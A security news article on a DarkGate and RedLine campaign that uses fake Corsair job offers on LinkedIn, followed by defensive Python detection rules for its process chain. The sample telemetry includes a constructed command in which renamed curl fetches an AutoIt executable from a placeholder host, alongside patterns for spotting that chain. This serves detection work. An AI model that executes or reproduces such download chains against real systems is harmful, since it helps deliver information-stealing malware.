The DarkGate malware operators have leveraged fake Corsair job offers to target LinkedIn users.
These operators have allegedly created fake LinkedIn posts and direct messages advertising an opening for a Facebook Ads specialist at Corsair. The primary objective is to bait job seekers into unwittingly downloading information-stealing malware such as DarkGate and RedLine.
Based on reports, Vietnamese cybercriminal groups are the primary suspects, since these attacks closely resemble the notorious 'Ducktail' campaigns identified last year, which the same groups are believed to have operated.
These threat actors want to steal valuable Facebook business accounts, which they can use for malicious advertising or sell to other cybercriminals.
The operator of the fake Corsair job offers has primarily targeted three countries.
Reports indicate that the fake Corsair job offers have spread widely in the US, the UK and India. The actors targeted individuals with backgrounds in social media management, since such people are likely to have access to Facebook business accounts.
The attackers delivered their bait through LinkedIn as a fraudulent job offer supposedly from Corsair. The campaign urges its targets to download files from the URL "g2[.]by/corsair-JD", which redirects to Google Drive or Dropbox.
The download is a ZIP archive containing three files: "Job Description of Corsair.docx", "Salary and new products.txt", and "PDF Salary and Products.pdf".
Further research uncovered that the metadata of these files contains links that distribute the RedLine stealer. The archive also includes a VBS script, possibly embedded in the DOCX file, which copies 'curl.exe' to a new location under a different name.
The script then uses this renamed curl binary to download 'autoit3.exe' and a compiled AutoIt3 script; the executable launches the script, which de-obfuscates itself and assembles DarkGate from embedded strings. Finally, the malware attempts to remove security products from the compromised system within 30 seconds of installation, indicating an automated process.
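The process chain above (a script host copying and renaming curl.exe, the renamed curl fetching an AutoIt interpreter and compiled script, AutoIt3.exe then launched from a user-writable location) is the part defenders can catch in process-creation telemetry before DarkGate is assembled. The rules below are an added example written for this article, not detection content from the report or from any vendor. The events are constructed Sysmon Event ID 1 style records reduced to four fields; the host paths, the file names dropper.vbs and update.exe, and the example.invalid download URL are placeholders, and treating launches from AppData/Temp as suspicious is an assumption to tune per environment.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Simplified Sysmon Event ID 1 (process creation) record. Field names follow
# Sysmon's: Image, OriginalFileName (read from the PE version resource, so it
# survives renaming on disk), CommandLine, ParentImage.
Event = Dict[str, str]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumption: AutoIt running from these locations is unusual in this environment.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\public\\", "\\programdata\\")
AUTOIT_ARTIFACT = re.compile(r"autoit3\.exe|\.a3x\b", re.IGNORECASE)


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def is_renamed_curl(ev: Event) -> bool:
    """PE metadata says curl.exe but the on-disk name does not:
    the VBS stage copying and renaming curl.exe."""
    return (ev.get("OriginalFileName", "").lower() == "curl.exe"
            and _name(ev.get("Image", "")) != "curl.exe")


def curl_fetches_autoit(ev: Event) -> bool:
    """Any curl binary whose command line names an AutoIt interpreter or a
    compiled .a3x script: the download stage of the chain."""
    return (ev.get("OriginalFileName", "").lower() == "curl.exe"
            and AUTOIT_ARTIFACT.search(ev.get("CommandLine", "")) is not None)


def suspicious_autoit_launch(ev: Event) -> bool:
    """AutoIt3.exe started by a script host or from a user-writable directory."""
    if _name(ev.get("Image", "")) != "autoit3.exe":
        return False
    parent = _name(ev.get("ParentImage", ""))
    image = ev.get("Image", "").lower()
    return parent in SCRIPT_HOSTS or any(p in image for p in USER_WRITABLE)


RULES = {
    "renamed_curl": is_renamed_curl,
    "curl_fetches_autoit": curl_fetches_autoit,
    "suspicious_autoit_launch": suspicious_autoit_launch,
}


def run_rules(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule_name, Image) for every event that trips a rule."""
    hits = []
    for ev in events:
        for rule, check in RULES.items():
            if check(ev):
                hits.append((rule, ev.get("Image", "")))
    return hits


# Constructed sample telemetry, not data from the report. example.invalid is a
# reserved non-resolving domain used instead of any real indicator.
SAMPLE_EVENTS: List[Event] = [
    {   # stage 1: script host runs the dropped VBS
        "Image": r"C:\Windows\System32\wscript.exe",
        "OriginalFileName": "wscript.exe",
        "CommandLine": r'wscript.exe "C:\Users\victim\Downloads\dropper.vbs"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # stage 2: curl.exe copied and renamed, then used to fetch AutoIt
        "Image": r"C:\Users\victim\AppData\Local\Temp\update.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": r"update.exe -o C:\Users\victim\AppData\Local\Temp\autoit3.exe http://example.invalid/autoit3.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
    },
    {   # stage 3: AutoIt interpreter launches the compiled script
        "Image": r"C:\Users\victim\AppData\Local\Temp\autoit3.exe",
        "OriginalFileName": "AutoIt3.exe",
        "CommandLine": r"autoit3.exe C:\Users\victim\AppData\Local\Temp\script.a3x",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
    },
    {   # benign: stock curl from System32 run by an administrator
        "Image": r"C:\Windows\System32\curl.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": r"curl https://example.invalid/status",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # benign: AutoIt from its install directory, started from the shell
        "Image": r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe",
        "OriginalFileName": "AutoIt3.exe",
        "CommandLine": r'"C:\Program Files (x86)\AutoIt3\AutoIt3.exe" backup.au3',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

if __name__ == "__main__":
    for rule, image in run_rules(SAMPLE_EVENTS):
        print(f"{rule:26s} {image}")
```

The three rules are deliberately independent so that each stage fires on its own even if the others are missed (for example, if the operators swap curl for another downloader but keep AutoIt). The renamed-curl check relies on Sysmon's OriginalFileName, which comes from the PE version resource and is unaffected by copying the binary under a new name; the same idea applies to any LOLBin the chain abuses.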
While LinkedIn introduced features last year to counter abuse of the platform, users must still verify the information provided before engaging with a new account.
Finally, the report provides a list of indicators of compromise (IoCs) that can assist organisations in defending against this threat actor, including IP addresses, domains, URLs, file metadata, and archive file names.